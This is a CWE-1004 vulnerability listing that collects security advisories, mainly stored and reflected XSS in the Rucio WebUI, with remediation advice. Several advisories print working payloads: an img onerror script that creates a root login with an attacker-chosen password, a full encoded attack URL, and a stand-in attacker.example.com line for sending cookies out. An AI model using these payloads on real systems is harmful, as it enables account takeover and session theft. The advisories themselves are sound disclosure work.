CWE-1004
AllowedSensitive Cookie Without 'HttpOnly' Flag
Abstraction: Variant · Status: Incomplete
The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.
70 vulnerabilities reference this CWE, most recent first.
GHSA-FQ4F-4738-RQXM
Vulnerability from github – Published: 2026-02-25 19:37 – Updated: 2026-02-27 21:50Summary
A stored Cross-site Scripting (XSS) vulnerability was identified in the Custom RSE Attribute of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.
Details
A stored XSS payload can be introduced via a custom RSE attribute value and is later rendered when the RSE is viewed.
Create Path:
Admin > RSE Management > RSE NAME > Add Attribute
Trigger Path:
Admin > RSE Management > RSE NAME
Request
POST /proxy/rses/WEB1/attr/XSS HTTP/1.1
...
{"value":"<script>alert('XSS')</script>"}
Response
HTTP/1.1 201 CREATED
...
Created
Storing XSS Payload in RSE Attribute
XSS Payload triggering when viewing RSE
Impact
Any authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.
The impact is amplified by: - Session cookies that are accessible to JavaScript (missing HttpOnly flag). - API tokens exposed to the WebUI via JavaScript variables.
An attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e GET https://attacker.example.com/rucio/{BASE64_COOKIE}).
Attackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.
XSS Payload to Create Root UserPass
<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>
Remediation / Mitigation
All client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as .html() should be avoided unless the content is explicitly sanitized. Safer alternatives include .text(), creating text nodes, or using a templating system that enforces automatic escaping.
Additional defense-in-depth measures include: - Enforcing a strict Content Security Policy (CSP). - Setting the HttpOnly flag on session cookies. - Avoiding exposure of API tokens in JavaScript-accessible variables.
Note that many pages were found setting the API token as
tokenin an authenticated response likevar token = "root-root-webui-...:"(See/ui/list_accountsfor example)
Resources
- OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "rucio-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "35.8.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "rucio-webui"
},
"ranges": [
{
"events": [
{
"introduced": "36.0.0rc1"
},
{
"fixed": "38.5.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "rucio-webui"
},
"ranges": [
{
"events": [
{
"introduced": "39.0.0rc1"
},
{
"fixed": "39.3.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25736"
],
"database_specific": {
"cwe_ids": [
"CWE-1004",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-25T19:37:27Z",
"nvd_published_at": "2026-02-25T20:23:48Z",
"severity": "MODERATE"
},
"details": "### Summary\nA stored Cross-site Scripting (XSS) vulnerability was identified in the Custom RSE Attribute of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.\n\n---\n### Details\nA stored XSS payload can be introduced via a custom RSE attribute value and is later rendered when the RSE is viewed.\n\n**Create Path**: \nAdmin \u003e RSE Management \u003e _RSE NAME_ \u003e Add Attribute\n\n**Trigger Path**: \nAdmin \u003e RSE Management \u003e _RSE NAME_\n\n**Request**\n```http\nPOST /proxy/rses/WEB1/attr/XSS HTTP/1.1\n...\n{\"value\":\"\u003cscript\u003ealert(\u0027XSS\u0027)\u003c/script\u003e\"}\n```\n\n**Response**\n```http\nHTTP/1.1 201 CREATED\n...\nCreated\n```\n\n**Storing XSS Payload in RSE Attribute**\n\u003cimg width=\"1234\" height=\"844\" alt=\"Storing XSS Payload in RSE Attribute\" src=\"https://github.com/user-attachments/assets/d10f58c2-8cea-43a9-bf7f-f94ef3d1fd81\" /\u003e\n\n**XSS Payload triggering when viewing RSE**\n\u003cimg width=\"1248\" height=\"949\" alt=\"XSS Payload triggering when viewing RSE\" src=\"https://github.com/user-attachments/assets/d536fac2-ab44-4cfb-b669-085a8c3db33e\" /\u003e\n---\n### Impact\nAny authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.\n\nThe impact is amplified by:\n- Session cookies that are accessible to JavaScript (missing HttpOnly flag).\n- API tokens exposed to the WebUI via JavaScript variables.\n\nAn attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\nAttackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.\n\n**XSS Payload to Create Root UserPass**\n```html\n\u003cimg src=x onerror=(function(){o={};o.method=\u0027PUT\u0027;o.credentials=\u0027include\u0027;o.headers={\u0027X-Rucio-Username\u0027:\u0027attackeruser\u0027,\u0027X-Rucio-Password\u0027:\u0027AttackerPassword123\u0027,\u0027X-Rucio-Email\u0027:\u0027demo@example.org\u0027,\u0027X-Rucio-Auth-Token\u0027:token};fetch(String.fromCharCode(47)+\u0027identities\u0027+String.fromCharCode(47)+\u0027root\u0027+String.fromCharCode(47)+\u0027userpass\u0027,o)})()\u003e\n```\n\n---\n### Remediation / Mitigation\nAll client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as `.html()` should be avoided unless the content is explicitly sanitized. Safer alternatives include `.text()`, creating text nodes, or using a templating system that enforces automatic escaping.\n\nAdditional defense-in-depth measures include:\n- Enforcing a strict Content Security Policy (CSP).\n- Setting the HttpOnly flag on session cookies.\n- Avoiding exposure of API tokens in JavaScript-accessible variables.\n\n\u003e Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n---\n### Resources\n- OWASP XSS Prevention Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)",
"id": "GHSA-fq4f-4738-rqxm",
"modified": "2026-02-27T21:50:31Z",
"published": "2026-02-25T19:37:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/rucio/rucio/security/advisories/GHSA-fq4f-4738-rqxm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25736"
},
{
"type": "WEB",
"url": "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/rucio/rucio"
},
{
"type": "WEB",
"url": "https://github.com/rucio/rucio/releases/tag/35.8.3"
},
{
"type": "WEB",
"url": "https://github.com/rucio/rucio/releases/tag/38.5.4"
},
{
"type": "WEB",
"url": "https://github.com/rucio/rucio/releases/tag/39.3.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Rucio WebUI has a Stored Cross-site Scripting (XSS) Vulnerability in its Custom RSE Attribute"
}
GHSA-GCH7-FP6F-5FP2
Vulnerability from github – Published: 2025-10-21 18:30 – Updated: 2025-11-07 21:31HTTP Security Misconfiguration - Lacking Secure and HTTPOnly Attribute may allow reading the sensitive cookies from the javascript contextThis issue affects BLU-IC2: through 1.19.5; BLU-IC4: through 1.19.5.
{
"affected": [],
"aliases": [
"CVE-2025-12031"
],
"database_specific": {
"cwe_ids": [
"CWE-1004"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-21T18:15:36Z",
"severity": "MODERATE"
},
"details": "HTTP Security Misconfiguration - Lacking Secure and HTTPOnly Attribute may allow reading\u00a0the sensitive cookies from the javascript contextThis issue affects BLU-IC2: through 1.19.5; BLU-IC4: through 1.19.5.",
"id": "GHSA-gch7-fp6f-5fp2",
"modified": "2025-11-07T21:31:19Z",
"published": "2025-10-21T18:30:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12031"
},
{
"type": "WEB",
"url": "https://azure-access.com/security-advisories"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-H2FF-JXXJ-CMX7
Vulnerability from github – Published: 2023-08-24 09:30 – Updated: 2024-04-04 07:10A vulnerability has been identified in ioLogik 4000 Series (ioLogik E4200) firmware versions v1.6 and prior, where the session cookies attribute is not set properly in the affected application. The vulnerability may lead to security risks, potentially exposing user session data to unauthorized access and manipulation.
{
"affected": [],
"aliases": [
"CVE-2023-4228"
],
"database_specific": {
"cwe_ids": [
"CWE-1004",
"CWE-732"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-08-24T07:15:11Z",
"severity": "MODERATE"
},
"details": "A vulnerability has been identified in ioLogik 4000 Series (ioLogik E4200) firmware versions v1.6 and prior, where the session cookies attribute is not set properly in the affected application. The vulnerability may lead to security risks, potentially exposing user session data to unauthorized access and manipulation.\n\n",
"id": "GHSA-h2ff-jxxj-cmx7",
"modified": "2024-04-04T07:10:23Z",
"published": "2023-08-24T09:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4228"
},
{
"type": "WEB",
"url": "https://www.moxa.com/en/support/product-support/security-advisory/mpsa-230310-iologik-4000-series-multiple-web-server-vulnerabilities-and-improper-access-control-vulnerability"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-H79M-5JJM-JM4Q
Vulnerability from github – Published: 2026-02-25 18:53 – Updated: 2026-02-27 21:49Summary
A reflected Cross-site Scripting vulnerability was located in the rendering of the ExceptionMessage of the WebUI 500 error which could allow attackers to steal login session tokens of users who navigate to a specially crafted URL.
Details
The WebUI error message renders ExceptionMessage (which can contain user-controlled input) as unencoded HTML. Server code that produces the message is in common.py - specifically error_headers -> _error_response -> generate_http_error_flask, which places ExceptionMessage into both response headers and the JSON body. The WebUI client then injects that text into the DOM using unsafe methods (examples in lib/rucio/web/ui/static/*.js such as rule.js, request_rule.js, list_rules.js) with jQuery.html(...) or equivalent, enabling reflected XSS when an attacker-controlled value is included in an error message (e.g. account, attribute, scope).
PoC
1) Reflected XSS via account parameter (browse or load URL in WebUI context):
https://127.0.0.1:8443/ui/account_rse_usage?account=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E
Server response (excerpt):
HTTP/1.1 500 INTERNAL SERVER ERROR
ExceptionClass: AccountNotFound
ExceptionMessage: Account <img src=x onerror=alert(document.cookie)> does not exist
Content-Type: application/octet-stream
{"ExceptionClass":"AccountNotFound","ExceptionMessage":"Account <img src=x onerror=alert(document.cookie)> does not exist"}
XSS payload triggering (Displaying session token) when browsing to crafted URL
When the WebUI inserts ExceptionMessage into the page with .html(...), the injected executes and displays the users' session tokens. Note that this is a PoC only, an attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e
GET https://attacker.example.com/rucio/{BASE64_COOKIE}).
2) Reflected XSS via account key attribute creation error:
POST /proxy/accounts/pentest/attr/XSS HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Origin: https://127.0.0.1:8443
X-Rucio-Script: webui::-ui-account
{"key":"XSS","value":"<script>alert(document.cookie)</script>"}
XSS payload triggering (Displaying session token) on error when creating account key
Server response (excerpt) contains ExceptionMessage with the raw <script> payload; the WebUI renders it unsafely and script executes. Note that this method is less impactful since it's not something that can be triggered with a URL alone, but is listed to show that this issue affects multiple locations.
Impact
Any authenticated WebUI user who follows a crafted link or triggers a request containing attacker-controlled input in a field that causes an error may execute arbitrary JavaScript in the WebUI origin. This vulnerability is more impactful due to the lack of protection of cookies (The Session token does not have HttpOnly attribute) and lack of Content Security Policy that would prevent thrid-party scripts from loading.
Attackers can steal session cookies/tokens or perform actions as the victim like creating a new UserPass identity with an attacker known password.
Example URL to Create UserPass for Root
https://localhost:8443/ui/account_rse_usage?account=%3Cimg%20src%3Dx%20onerror%3D(function()%7Bo%3D%7B%7D%3Bo.method%3D'PUT'%3Bo.credentials%3D'include'%3Bo.headers%3D%7B'X-Rucio-Username'%3A'attackeruser'%2C'X-Rucio-Password'%3A'AttackerPassword123'%2C'X-Rucio-Email'%3A'demo%40example.org'%2C'X-Rucio-Auth-Token'%3Atoken%7D%3Bfetch(String.fromCharCode(47)%2B'identities'%2BString.fromCharCode(47)%2B'root'%2BString.fromCharCode(47)%2B'userpass'%2Co)%7D)()%3E
Account Payload to Create UserPass
<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>
Creating identity for Root account via reflected XSS
All WebUI users are impacted.
Remediation / Mitigation
Change all client-side insertions of server-provided text from .html(...) to .text() or create text nodes / escape HTML before insertion. Example: replace $('#elem').html(msg) with $('#elem').empty().append($('<span>').text(msg)).
Additionally, consider adding a Content Security Policy (CSP) to mitigate external script execution and set the HTTPOnly flag for session cookies. Also, the API token should not be set in a JavaScript variable as it can be accessed by an attacker even with the HTTPOnly flag set on the session cookie.
Note that many pages were found setting the API token as
tokenin an authenticated response likevar token = "root-root-webui-...:"(See/ui/list_accountsfor example)
References:
- Server functions:
common.py(error_headers,_error_response, generate_http_error_flask) - Example client files to fix:
lib/rucio/web/ui/static/rule.js,lib/rucio/web/ui/static/request_rule.js, list_rules.js - OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "rucio-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "35.8.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "rucio-webui"
},
"ranges": [
{
"events": [
{
"introduced": "36.0.0rc1"
},
{
"fixed": "38.5.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "rucio-webui"
},
"ranges": [
{
"events": [
{
"introduced": "39.0.0rc1"
},
{
"fixed": "39.3.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25136"
],
"database_specific": {
"cwe_ids": [
"CWE-1004",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-25T18:53:29Z",
"nvd_published_at": "2026-02-25T20:23:47Z",
"severity": "HIGH"
},
"details": "### Summary\nA reflected Cross-site Scripting vulnerability was located in the rendering of the ExceptionMessage of the WebUI 500 error which could allow attackers to steal login session tokens of users who navigate to a specially crafted URL.\n\n#### Details\nThe WebUI error message renders `ExceptionMessage` (which can contain user-controlled input) as unencoded HTML. Server code that produces the message is in `common.py` - specifically `error_headers -\u003e _error_response -\u003e generate_http_error_flask`, which places `ExceptionMessage` into both response headers and the JSON body. The WebUI client then injects that text into the DOM using unsafe methods (examples in `lib/rucio/web/ui/static/*.js` such as `rule.js`, `request_rule.js`, `list_rules.js`) with `jQuery.html(...)` or equivalent, enabling reflected XSS when an attacker-controlled value is included in an error message (e.g. account, attribute, scope).\n\n### PoC\n1) Reflected XSS via account parameter (browse or load URL in WebUI context):\n```text\nhttps://127.0.0.1:8443/ui/account_rse_usage?account=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E\n```\nServer response (excerpt):\n```http\nHTTP/1.1 500 INTERNAL SERVER ERROR\nExceptionClass: AccountNotFound\nExceptionMessage: Account \u003cimg src=x onerror=alert(document.cookie)\u003e does not exist\nContent-Type: application/octet-stream\n\n{\"ExceptionClass\":\"AccountNotFound\",\"ExceptionMessage\":\"Account \u003cimg src=x onerror=alert(document.cookie)\u003e does not exist\"}\n```\n\n**XSS payload triggering (Displaying session token) when browsing to crafted URL**\n\u003cimg width=\"1210\" height=\"510\" alt=\"XSS payload triggering (Displaying session token) when browsing to crafted URL\" src=\"https://github.com/user-attachments/assets/989a0aed-628d-4f1c-bbfb-de434dab8af6\" /\u003e\n\nWhen the WebUI inserts `ExceptionMessage` into the page with `.html(...)`, the injected \u003cimg onerror=...\u003e executes and displays the users\u0027 session tokens. Note that this is a PoC only, an attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\n2) Reflected XSS via account key attribute creation error:\n```http\nPOST /proxy/accounts/pentest/attr/XSS HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nOrigin: https://127.0.0.1:8443\nX-Rucio-Script: webui::-ui-account\n{\"key\":\"XSS\",\"value\":\"\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\"}\n```\n\n**XSS payload triggering (Displaying session token) on error when creating account key**\n\u003cimg width=\"1322\" height=\"593\" alt=\"XSS payload triggering (Displaying session token) on error when creating account key\" src=\"https://github.com/user-attachments/assets/151cb0ad-e4f0-498e-954e-be3455ca8a72\" /\u003e\n\nServer response (excerpt) contains `ExceptionMessage` with the raw `\u003cscript\u003e` payload; the WebUI renders it unsafely and script executes. Note that this method is less impactful since it\u0027s not something that can be triggered with a URL alone, but is listed to show that this issue affects multiple locations.\n\n### Impact\nAny authenticated WebUI user who follows a crafted link or triggers a request containing attacker-controlled input in a field that causes an error may execute arbitrary JavaScript in the WebUI origin. This vulnerability is more impactful due to the lack of protection of cookies (The Session token does not have HttpOnly attribute) and lack of Content Security Policy that would prevent thrid-party scripts from loading.\n\nAttackers can steal session cookies/tokens or perform actions as the victim like creating a new UserPass identity with an attacker known password. \n\n**Example URL to Create UserPass for Root**\n```\nhttps://localhost:8443/ui/account_rse_usage?account=%3Cimg%20src%3Dx%20onerror%3D(function()%7Bo%3D%7B%7D%3Bo.method%3D\u0027PUT\u0027%3Bo.credentials%3D\u0027include\u0027%3Bo.headers%3D%7B\u0027X-Rucio-Username\u0027%3A\u0027attackeruser\u0027%2C\u0027X-Rucio-Password\u0027%3A\u0027AttackerPassword123\u0027%2C\u0027X-Rucio-Email\u0027%3A\u0027demo%40example.org\u0027%2C\u0027X-Rucio-Auth-Token\u0027%3Atoken%7D%3Bfetch(String.fromCharCode(47)%2B\u0027identities\u0027%2BString.fromCharCode(47)%2B\u0027root\u0027%2BString.fromCharCode(47)%2B\u0027userpass\u0027%2Co)%7D)()%3E\n```\n\n**Account Payload to Create UserPass**\n```html\n\u003cimg src=x onerror=(function(){o={};o.method=\u0027PUT\u0027;o.credentials=\u0027include\u0027;o.headers={\u0027X-Rucio-Username\u0027:\u0027attackeruser\u0027,\u0027X-Rucio-Password\u0027:\u0027AttackerPassword123\u0027,\u0027X-Rucio-Email\u0027:\u0027demo@example.org\u0027,\u0027X-Rucio-Auth-Token\u0027:token};fetch(String.fromCharCode(47)+\u0027identities\u0027+String.fromCharCode(47)+\u0027root\u0027+String.fromCharCode(47)+\u0027userpass\u0027,o)})()\u003e\n```\n\n**Creating identity for Root account via reflected XSS**\n\u003cimg width=\"1558\" height=\"957\" alt=\"Creating identity for Root account via reflected XSS\" src=\"https://github.com/user-attachments/assets/539bfff4-70f3-42c5-b83a-10b5f85d6d44\" /\u003e\n\nAll WebUI users are impacted.\n\n### Remediation / Mitigation\nChange all client-side insertions of server-provided text from `.html(...)` to `.text()` or create text nodes / escape HTML before insertion. Example: replace `$(\u0027#elem\u0027).html(msg)` with `$(\u0027#elem\u0027).empty().append($(\u0027\u003cspan\u003e\u0027).text(msg))`.\n\nAdditionally, consider adding a Content Security Policy (CSP) to mitigate external script execution and set the HTTPOnly flag for session cookies. Also, the API token should not be set in a JavaScript variable as it can be accessed by an attacker even with the HTTPOnly flag set on the session cookie.\n\n\u003e Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n#### References:\n- Server functions: `common.py` (`error_headers`, `_error_response, generate_http_error_flask`)\n- Example client files to fix: `lib/rucio/web/ui/static/rule.js`, `lib/rucio/web/ui/static/request_rule.js, list_rules.js`\n- OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html",
"id": "GHSA-h79m-5jjm-jm4q",
"modified": "2026-02-27T21:49:51Z",
"published": "2026-02-25T18:53:29Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/rucio/rucio/security/advisories/GHSA-h79m-5jjm-jm4q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25136"
},
{
"type": "WEB",
"url": "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/rucio/rucio"
},
{
"type": "WEB",
"url": "https://github.com/rucio/rucio/releases/tag/35.8.3"
},
{
"type": "WEB",
"url": "https://github.com/rucio/rucio/releases/tag/38.5.4"
},
{
"type": "WEB",
"url": "https://github.com/rucio/rucio/releases/tag/39.3.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Rucio WebUI has a Reflected Cross-site Scripting Vulnerability"
}
GHSA-H9FP-P2P9-873Q
Vulnerability from github – Published: 2026-02-25 19:29 – Updated: 2026-02-27 21:50Summary
A stored Cross-site Scripting (XSS) vulnerability was identified in the RSE metadata of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.
Details
Several metadata fields accept arbitrary input which is stored and later rendered unsafely in the WebUI when the RSEs are listed in the RSE Management dashboard.
Create Path:
Admin > RSE Management
Trigger Paths:
Admin > RSE Management
Admin > RSE Management > RSE NAME
Vulnerable Attributes:
City, Country_Name, ISP
Request
POST /proxy/rses/XSSTEST HTTP/1.1
...
{"city":"<script>alert('CITY XSS')</script>","country_name":"<script>alert('COUNTRY XSS')</script>","ISP":"<script>alert('ISP XSS')</script>","deterministic":false,"volatile":false,"staging_area":false}
Response
HTTP/1.1 201 CREATED
...
Created
Stored XSS payload triggering in RSE listing after adding XSS payload in metadata
Impact
Any authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.
The impact is amplified by: - Session cookies that are accessible to JavaScript (missing HttpOnly flag). - API tokens exposed to the WebUI via JavaScript variables.
An attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e GET https://attacker.example.com/rucio/{BASE64_COOKIE}).
Attackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.
XSS Payload to Create Root UserPass
<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>
Remediation / Mitigation
All client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as .html() should be avoided unless the content is explicitly sanitized. Safer alternatives include .text(), creating text nodes, or using a templating system that enforces automatic escaping.
Additional defense-in-depth measures include: - Enforcing a strict Content Security Policy (CSP). - Setting the HttpOnly flag on session cookies. - Avoiding exposure of API tokens in JavaScript-accessible variables.
Note that many pages were found setting the API token as
tokenin an authenticated response likevar token = "root-root-webui-...:"(See/ui/list_accountsfor example)
Resources
- OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "rucio-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "35.8.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "rucio-webui"
},
"ranges": [
{
"events": [
{
"introduced": "36.0.0rc1"
},
{
"fixed": "38.5.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "rucio-webui"
},
"ranges": [
{
"events": [
{
"introduced": "39.0.0rc1"
},
{
"fixed": "39.3.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25734"
],
"database_specific": {
"cwe_ids": [
"CWE-1004",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-25T19:29:22Z",
"nvd_published_at": "2026-02-25T20:23:47Z",
"severity": "MODERATE"
},
"details": "### Summary\nA stored Cross-site Scripting (XSS) vulnerability was identified in the RSE metadata of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.\n\n---\n### Details\nSeveral metadata fields accept arbitrary input which is stored and later rendered unsafely in the WebUI when the RSEs are listed in the RSE Management dashboard.\n\n**Create Path**: \nAdmin \u003e RSE Management\n\n**Trigger Paths**: \nAdmin \u003e RSE Management \nAdmin \u003e RSE Management \u003e _RSE NAME_\n\n**Vulnerable Attributes**: \nCity, Country_Name, ISP\n\n**Request**\n```http\nPOST /proxy/rses/XSSTEST HTTP/1.1\n...\n{\"city\":\"\u003cscript\u003ealert(\u0027CITY XSS\u0027)\u003c/script\u003e\",\"country_name\":\"\u003cscript\u003ealert(\u0027COUNTRY XSS\u0027)\u003c/script\u003e\",\"ISP\":\"\u003cscript\u003ealert(\u0027ISP XSS\u0027)\u003c/script\u003e\",\"deterministic\":false,\"volatile\":false,\"staging_area\":false}\n```\n\n**Response**\n```http\nHTTP/1.1 201 CREATED\n...\nCreated\n```\n\n**Stored XSS payload triggering in RSE listing after adding XSS payload in metadata**\n\u003cimg width=\"1252\" height=\"624\" alt=\"Stored XSS payload triggering in RSE listing after adding XSS payload in metadata\" src=\"https://github.com/user-attachments/assets/6546fc95-0c81-4db7-9271-37b5d4bc8f47\" /\u003e\n\n---\n### Impact\nAny authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.\n\nThe impact is amplified by:\n- Session cookies that are accessible to JavaScript (missing HttpOnly flag).\n- API tokens exposed to the WebUI via JavaScript variables.\n\nAn attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\nAttackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.\n\n**XSS Payload to Create Root UserPass**\n```html\n\u003cimg src=x onerror=(function(){o={};o.method=\u0027PUT\u0027;o.credentials=\u0027include\u0027;o.headers={\u0027X-Rucio-Username\u0027:\u0027attackeruser\u0027,\u0027X-Rucio-Password\u0027:\u0027AttackerPassword123\u0027,\u0027X-Rucio-Email\u0027:\u0027demo@example.org\u0027,\u0027X-Rucio-Auth-Token\u0027:token};fetch(String.fromCharCode(47)+\u0027identities\u0027+String.fromCharCode(47)+\u0027root\u0027+String.fromCharCode(47)+\u0027userpass\u0027,o)})()\u003e\n```\n\n---\n### Remediation / Mitigation\nAll client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as `.html()` should be avoided unless the content is explicitly sanitized. Safer alternatives include `.text()`, creating text nodes, or using a templating system that enforces automatic escaping.\n\nAdditional defense-in-depth measures include:\n- Enforcing a strict Content Security Policy (CSP).\n- Setting the HttpOnly flag on session cookies.\n- Avoiding exposure of API tokens in JavaScript-accessible variables.\n\n\u003e Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n---\n### Resources\n- OWASP XSS Prevention Cheat Sheet: 